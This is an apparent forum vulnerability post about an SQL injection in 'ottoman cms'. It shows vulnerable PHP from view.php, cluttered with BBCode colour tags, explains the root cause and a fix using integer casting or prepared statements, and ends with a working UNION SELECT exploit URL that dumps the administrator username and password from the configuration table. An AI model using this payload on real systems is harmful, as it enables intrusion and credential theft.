
23.08.2011, 14:27
ottoman cms[SQL-Injection]
view.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
include[/COLOR][COLOR="#DD0000"]'header.php'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]// Detect If User Is Logged In
[/COLOR][COLOR="#007700"]if (empty([/COLOR][COLOR="#0000BB"]$logged_in[/COLOR][COLOR="#007700"])) {[/COLOR][COLOR="#0000BB"]$login_form[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"form"[/COLOR][COLOR="#007700"]; include[/COLOR][COLOR="#DD0000"]'login.php'[/COLOR][COLOR="#007700"]; }
else {
[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]];
switch([/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"])
{
case[/COLOR][COLOR="#0000BB"]article[/COLOR][COLOR="#007700"]:
[/COLOR][COLOR="#FF8000"]// Top Menu
[/COLOR][COLOR="#007700"]echo[/COLOR][COLOR="#DD0000"]"Article Viewer"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$article_sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM articles WHERE id = '[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);
while([/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$article_sql[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]Article[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]show[/COLOR][COLOR="#007700"]();
echo[/COLOR][COLOR="#DD0000"]" [/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]article_name[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]article_status[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"private"[/COLOR][COLOR="#007700"]) { echo[/COLOR][COLOR="#DD0000"]" [private]"[/COLOR][COLOR="#007700"]; }
if ([/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]article_status[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"draft"[/COLOR][COLOR="#007700"]) { echo[/COLOR][COLOR="#DD0000"]" [draft]"[/COLOR][COLOR="#007700"]; }
...[/COLOR][/COLOR]
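Root cause: in the listing above, $id is read from $_GET['id'] and interpolated directly into the string "SELECT * FROM articles WHERE id = '$id'" passed to mysql_query(), with no escaping or type check, so the request parameter can change the structure of the query. The branch sits in the else of the empty($logged_in) check, so as shown it runs only when $logged_in is set (where that variable is assigned is not visible in this excerpt). The request below targets the admin_user and admin_pass columns of the configuration table, so the impact is disclosure of administrator credentials. Fix: cast id to an integer before use, or bind it as a parameter in a prepared statement (mysqli or PDO) instead of building the SQL string.
exploit: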
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//temp/veiw.php?type=article&id=1+UNION+SELECT+1,group_concat(admin_user,0x3a,admin_pass+SEPARATOR+0x3c62723e),3,4,5,6,7+FROM+configuration+--
[/COLOR][/COLOR]